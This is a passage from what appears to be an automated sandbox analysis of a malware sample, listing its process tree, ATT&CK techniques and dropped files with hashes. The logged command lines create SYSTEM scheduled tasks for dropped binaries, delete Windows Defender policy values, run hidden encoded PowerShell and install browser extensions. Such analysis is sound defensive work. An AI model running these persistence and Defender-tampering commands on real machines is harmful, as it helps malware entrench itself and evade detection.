                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "gbuklpUJi"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:3804
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /CREATE /TN "JkyFYglxaRELEtiZK" /SC once /ST 10:41:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ffBOsjvhiwhBXqAi\TaxhuBLqMdnWRXM\ZDogjes.exe\" OT /site_id 690689 /S" /V1 /F
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                      PID:2916
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /run /I /tn "JkyFYglxaRELEtiZK"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1800
                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3388
                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:4776
                                                                                                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:540
                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:2020
                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1876
                                                                                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4832
                                                                                                                                                                                                                                              • C:\Windows\Temp\ffBOsjvhiwhBXqAi\TaxhuBLqMdnWRXM\ZDogjes.exe
                                                                                                                                                                                                                                                C:\Windows\Temp\ffBOsjvhiwhBXqAi\TaxhuBLqMdnWRXM\ZDogjes.exe OT /site_id 690689 /S
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                                                                                                • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                PID:1292
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "bIIVPNBwJtQvPFWhKj"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:3548
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:2060
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4048
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:1624
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:2616
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\cyYOBkwuU\VUOlzv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JexVkIJlQeblOjO" /V1 /F
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:4872
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                            schtasks /CREATE /TN "JexVkIJlQeblOjO2" /F /xml "C:\Program Files (x86)\cyYOBkwuU\bFKybfM.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:5040
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                            schtasks /END /TN "JexVkIJlQeblOjO"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:1232
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "JexVkIJlQeblOjO"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1336
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /CREATE /TN "VQYxXLntyBcMUg" /F /xml "C:\Program Files (x86)\YDeMNrUWYcEU2\MHyJqyl.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:4184
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /CREATE /TN "QwlvWhTNpHCaj2" /F /xml "C:\ProgramData\VdsMkNQPiTWtDKVB\wWQjopK.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:5016
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /CREATE /TN "IDnADNaRSIYhvWeSC2" /F /xml "C:\Program Files (x86)\MtmchuUihttnWuuiNDR\RFWwosQ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:1004
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /CREATE /TN "yTiPAVRehfjvtWhHuuO2" /F /xml "C:\Program Files (x86)\sggSNgPbIWTFC\mtGkiUt.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:216
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /CREATE /TN "WtCrNUziOPqbUwgHC" /SC once /ST 09:12:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\tFaUUDcl\zYfKMuB.dll\",#1 /site_id 690689" /V1 /F
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:1212
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /run /I /tn "WtCrNUziOPqbUwgHC"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:5052
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:3964
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:5036
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:2324
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:2724
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "JkyFYglxaRELEtiZK"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:2924
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2884 -ip 2884
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:3032
                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ffBOsjvhiwhBXqAi\tFaUUDcl\zYfKMuB.dll",#1 /site_id 690689
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:4704
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ffBOsjvhiwhBXqAi\tFaUUDcl\zYfKMuB.dll",#1 /site_id 690689
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                PID:3276
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "WtCrNUziOPqbUwgHC"
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:4104
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2884 -ip 2884
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:4960
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2884 -ip 2884
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:1944
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2884 -ip 2884
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:3556
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\mmc.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                      PID:3316
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /7
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                      PID:2128

                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                    Bootkit

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1067

                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                    Security Software Discovery

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1063

                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.5MB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      86554df719884fc253d2fbaddf86b8ac

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      239e41a0d77ce23b78f01160d537da6ce2765168

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      265ad7a9cb950fb49b70ac61ca4f9abe84a317367f88814b8cc13d2b41f74469

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      503c0cace3add8bb8f563609e9c2bebd4ce93d5ef8843bbfafcd9a70ba72df25a7a9f5d4752bdc8c21d56ea6c7440247ec75fe361c7e50f08e5f338903dfc1ec

                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2.5MB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      86554df719884fc253d2fbaddf86b8ac

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      239e41a0d77ce23b78f01160d537da6ce2765168

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      265ad7a9cb950fb49b70ac61ca4f9abe84a317367f88814b8cc13d2b41f74469

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      503c0cace3add8bb8f563609e9c2bebd4ce93d5ef8843bbfafcd9a70ba72df25a7a9f5d4752bdc8c21d56ea6c7440247ec75fe361c7e50f08e5f338903dfc1ec

                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\ImageComparer\IC329.exe
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      548af625c71ca2fcab2364d11bdcefa5

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      dc90387830f25b0c55c6e67377621739442bef93

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      ac80e5960a6b21478375d4fec460d9edbe8d69b37bdd70162aca94b1d32f398c

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      b0e35f1d3a6c06ef2b9962c2912222158cbc3742261cb84b710a679a1092ea6b39439373523fbe30e6a6f3307530891974d53f60dc4f20d958364c230d0008f0

                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\ImageComparer\IC329.exe
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      548af625c71ca2fcab2364d11bdcefa5

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      dc90387830f25b0c55c6e67377621739442bef93

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      ac80e5960a6b21478375d4fec460d9edbe8d69b37bdd70162aca94b1d32f398c

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      b0e35f1d3a6c06ef2b9962c2912222158cbc3742261cb84b710a679a1092ea6b39439373523fbe30e6a6f3307530891974d53f60dc4f20d958364c230d0008f0

                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\MtmchuUihttnWuuiNDR\RFWwosQ.xml
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      7aa2fa38f4fbea00395ed412a6df4746

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      2f5a256eca9b77d7da541e324efb9d1056cc862c

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      0ec303fbf16c979f6d6cf9530ec077a520d5022441aaa661a6355e53299b61ca

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      dde95bd4fec9dd40b4fbac28474110c1e918f820502848be4b2ac61b3deb48962f791c82df1d70a4c699b278d8182e2fff14a0e9463c4da1b04caef0331013a6

                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\YDeMNrUWYcEU2\MHyJqyl.xml
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      d3bfd45c730163546d8e4f594291588a

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      1a4757475865c7ba76427e271276315073bff892

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      6bdf4b56e784edbe3ec3070fb75a06c14f00546fbd8928b629600b93a72873de

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      f4835c7e62bbcf4121454a419353d34155a24fcbd8c2a2e00a40936945bcfa1ed543e718e1d7dddc99c92e09118503f627f164a4d207a029577e2757069ef080

                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\cyYOBkwuU\bFKybfM.xml
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      87b5f938a2f92d6e2984af547e1f62d1

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      ced0cd773b216e4eeb935034287f2da7753c13ae

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      edad06d0005be00f4cbf089885b9715819cf36bba653bd41ccac58a2f47e7210

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      7dacf80652da2b0328b25029194514c4f6bba798ebe74b6e19e6ef415bbdcbe28f3e0d5a16ab23a85a58303e51a962c928b9897622a0406f96cf3802c9b38068

                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\sggSNgPbIWTFC\mtGkiUt.xml
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      bbee7e3dfe63a1d08460ea8386f565c6

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      7c1d0c6165b325d38cdf7b1625a22b7c91fb5a38

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      819839578f3074559fbd744e8cd03c58ccfd3e5d06bf7c34eb0522a88d9e5222

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      e710cb74e29ea7591f5901a889d3ff9851b317e28a4676874cffe3e842be759db8180fd39ce1aa5634ddde1c146e1bdcac071043b7c9628158d264546a2b5e82

                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{A5735E22-7BD8-4CED-A24E-FBBD2D9CABB9}.xpi
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      369KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      0485e21ec2eb824f96965a7921ba2d48

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      2f11724b51a2b5d4fa80b351bfc9a20aebd6520b

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      9d89e05256b0361b7fcc9c8e81c2252033a3d34757db296f695eaa1443acd055

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      186f7b922afd1153764eaa90c398befc89fb0e4160dc005947f17591bd58614e6f33a1a51134c075d7e773ea8e6e90174831def1b462857f43f76e9b371da483

                                                                                                                                                                                                                                                                                    • C:\ProgramData\VdsMkNQPiTWtDKVB\wWQjopK.xml
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      f956c0e36426b76d4efc0a3b5b986d5d

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      02ea6e1bf9fe108a42a41c2e68e66aa8f67c3763

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      2d027c64a2a4631c15aa8edd0179809afe6d28973fae44d194a0b86217ebf5a9

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      b449867403f33166b810f6732ba97b52b323910d57bcbc22e160b7c39824eeda809e418895f4e5b97b8478219659deaea4429ace06130845fd39307d1ef23489

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\iddmabhekhhonkmomaklnflhhgbfnioe\1.0.0_0\_locales\en\messages.json
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      33292c7c04ba45e9630bb3d6c5cabf74

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      3482eb8038f429ad76340d3b0d6eea6db74e31bd

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\iddmabhekhhonkmomaklnflhhgbfnioe\1.0.0_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      161B

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      5c5a1426ff0c1128c1c6b8bc20ca29ac

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      0e3540b647b488225c9967ff97afc66319102ccd

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      12KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      5d039e15d38b75c1c2fb9460ac372912

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      18d3a75243da68bee9a1741c8bc82e001e2e01f6

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      daac12254493f3a071fb39b4c14d7bce7a3f63fc4766844ea5596fa8e4d1550a

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      4a1e93195227863348ac890c3ea73346da5e29f3b0e686c2efdb63547015f00a48166384b06d8a76aa56a9d754cc0342712c91890f02afa7a3e086a93e5eb227

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ggnchfknjkebijkdlbddehcpgfebapdc\4.96_0\_locales\es\messages.json
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      186B

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      a14d4b287e82b0c724252d7060b6d9e9

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      da9d3da2df385d48f607445803f5817f635cc52d

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                      Filesize

